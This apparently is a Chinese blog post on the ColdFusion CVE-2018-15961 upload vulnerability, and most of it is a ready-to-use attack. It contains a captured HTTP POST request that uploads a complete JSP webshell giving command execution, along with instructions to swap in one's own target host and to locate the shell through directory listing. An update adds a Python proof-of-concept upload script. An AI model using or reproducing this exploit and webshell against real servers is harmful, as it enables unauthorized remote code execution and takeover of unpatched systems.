Adobe 在新的bulletin里面提到了CVE-2018-15961被大量利用:https://helpx.adobe.com/security/products/coldfusion/apsb18-33.html 网上最早的分析报告有:https://www.volexity.com/blog/2018/11/08/active-exploitation-of-newly-patched-coldfusion-vulnerability-cve-2018-15961/ 但是里面并没有提到具体的POST包,我本地搭建环境,抓了下包,得到了最终getshell的POST包:
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1
Host: 172.16.59.130:8500
Content-Length: 1115
Cache-Control: max-age=0
Origin: http://172.16.59.130:8500
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynLGnAOgQ8df3hQ61
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://172.16.59.130:8500/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/filemanager.cfm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Cookie: JSESSIONID=E69D416EB891D3E7CDBF0FE787F13E79.cfusion
Connection: close
------WebKitFormBoundarynLGnAOgQ8df3hQ61
Content-Disposition: form-data; name="file"; filename="test.jsp"
Content-Type: application/octet-stream
<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
------WebKitFormBoundarynLGnAOgQ8df3hQ61
Content-Disposition: form-data; name="path"
1
------WebKitFormBoundarynLGnAOgQ8df3hQ61--
把host改成你的目标即可,这里需要注意的是path参数一定要指定。成功上传之后会在filemanager目录下创建一个uploadedFiles目录,上传webshell就在该目录下 coldfusion默认部署完是存在列目录的漏洞,所以找到上传的文件不难。如果uploadedFiles目录里面已经存在相同的文件xxoo.jsp,新上传的文件会被改名为xxoo1.jsp xx002.jsp
写在最后,希望大家在研究漏洞的时候注意自身安全,已经有多个国外媒体提到这次漏洞疑似中国的apt攻击,有人利用该漏洞上传了china chopper(菜刀)
#update 2018-11-20 更新下python版的PoC:
def main(argv):
print "Proof of Concept"
print "Copyright Trend Micro Security Research"
print "All Rights Reserved.\n"
args = parse_args(argv)
host = args['host']
port = args['port']
# Upload file
CRLF = "\r\n"
body = '--XX' + CRLF
body += 'Content-Disposition: form-data; name="path"' + CRLF
body += CRLF
body += '/home/' + CRLF
body += '--XX' + CRLF
body += 'Content-Disposition: form-data; name="file"; filename="poc.jsp"' + CRLF
body += 'Content-Type: application/octet-stream' + CRLF
body += CRLF
body += '''<%@ page import="java.util.*, java.io.*" %>
<% Runtime run = Runtime.getRuntime();
Process p = run.exec("calc.exe");
try{ p.waitFor(); }
catch(InterruptedException e)
{ System.out.println(e); } %> ''' + CRLF
body += "--XX--"
lenn = str(len(body))
headers = {"Accept": "*/*",
"Connection": "keep-alive",
"Host": host + ":" + str(args['port']),
"Content-Length": "" + lenn,
"Content-Type": "multipart/form-data; boundary=XX"}
conN = httplib.HTTPConnection(args['host']+ ":" + str(args['port']))
print "[*] Uploading .jsp file to server..."
conN.request("POST", "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm?action=upload",
body, headers)
response = conN.getresponse()
buf = response.read()
print "[*] Requesting uploaded .jsp file..."
conN = httplib.HTTPConnection(args['host'] + ":" + str(args['port']))
conN.request("GET", "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/poc.jsp")
print "[*] Check the server to see if CVE-2018-15961 has been triggered.\n"